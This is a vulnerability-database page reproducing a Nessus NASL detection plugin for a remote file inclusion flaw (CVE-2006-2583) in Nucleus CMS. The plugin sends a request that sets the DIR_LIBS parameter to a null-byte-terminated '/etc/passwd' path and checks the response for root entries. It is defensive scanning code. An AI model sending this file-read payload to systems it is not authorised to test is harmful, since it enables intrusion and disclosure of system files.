| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| Nucleus CMS < 3.23 PLUGINADMIN.php DIR_LIBS Parameter Remote File Inclusion | 25 May 200600:00 | – | nessus | |
| CVE-2006-2595 | 25 May 200610:02 | – | attackerkb | |
| CVE-2006-2583 | 25 May 200610:00 | – | cve | |
| CVE-2006-2583 | 25 May 200610:00 | – | cvelist | |
| EUVD-2006-2582 | 7 Oct 202500:30 | – | euvd | |
| CVE-2006-2583 | 25 May 200610:02 | – | nvd | |
| Remote file inclusion | 25 May 200610:02 | – | prion | |
| PT-2006-3529 · Nucleus · Nucleus | 25 May 200600:00 | – | ptsecurity |
| Source | Link |
|---|---|
| securityfocus | www.securityfocus.com/archive/1/434837/30/0/threaded |
| nucleuscms | www.nucleuscms.org/item/3038 |
| cve | www.cve.mitre.org/cgi-bin/cvename.cgi |
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(21596);
script_version("1.19");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2006-2583");
script_bugtraq_id(18097);
script_name(english:"Nucleus CMS PLUGINADMIN.php DIR_LIBS Parameter Remote File Inclusion");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that is prone to remote
file inclusion attacks.");
script_set_attribute(attribute:"description", value:
"The remote host is running Nucleus CMS, an open source content
management system.
The version of Nucleus CMS installed on the remote host fails to
sanitize input to the 'DIR_LIBS' parameter before using it in a PHP
include() function in the 'nucleus/libs/PLUGINADMIN.php' script.
Provided PHP's 'register_globals' setting is enabled, an
unauthenticated attacker may be able to exploit this flaw to view
arbitrary files on the remote host or to execute arbitrary PHP code,
possibly taken from third-party hosts.");
script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/434837/30/0/threaded");
script_set_attribute(attribute:"see_also", value:"http://nucleuscms.org/item/3038");
script_set_attribute(attribute:"solution", value:
"Upgrade to Nucleus version 3.23 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:W/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2006/05/23");
script_set_attribute(attribute:"plugin_publication_date", value:"2006/05/25");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:nucleus_group:nucleus_cms");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2006-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("http_version.nasl");
script_require_keys("www/PHP");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");
port = get_http_port(default:80, embedded: 0);
if (!can_host_php(port:port)) exit(0);
# Loop through various directories.
if (thorough_tests) dirs = list_uniq(make_list("/nucleus", "/blog", cgi_dirs()));
else dirs = make_list(cgi_dirs());
foreach dir (dirs)
{
# Try to exploit the flaw to read a file.
file = "/etc/passwd%00";
w = http_send_recv3(method:"GET",
item:string(
dir, "/nucleus/libs/PLUGINADMIN.php?",
"GLOBALS[DIR_LIBS]=", file
),
port:port
);
if (isnull(w)) exit(1, "The web server on port "+port+" did not answer");
res = w[2];
# There's a problem if...
if (
# there's an entry for root or...
egrep(pattern:"root:.*:0:[01]:", string:res) ||
# we get an error saying "failed to open stream".
egrep(pattern:"main\(/etc/passwd\\0ADMIN\.php.+ failed to open stream", string:res) ||
# we get an error claiming the file doesn't exist or...
egrep(pattern:"main\(/etc/passwd\).*: failed to open stream: No such file or directory", string:res) ||
# we get an error about open_basedir restriction.
egrep(pattern:"main.+ open_basedir restriction in effect. File\(/etc/passwd", string:res)
)
{
if (egrep(string:res, pattern:"root:.*:0:[01]:"))
{
res = data_protection::redact_etc_passwd(output:res);
report = string(
"\n",
"Here are the contents of the file '/etc/passwd' that Nessus\n",
"was able to read from the remote host :\n",
"\n",
res
);
security_warning(port:port, extra:report);
}
else security_warning(port);
exit(0);
}
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation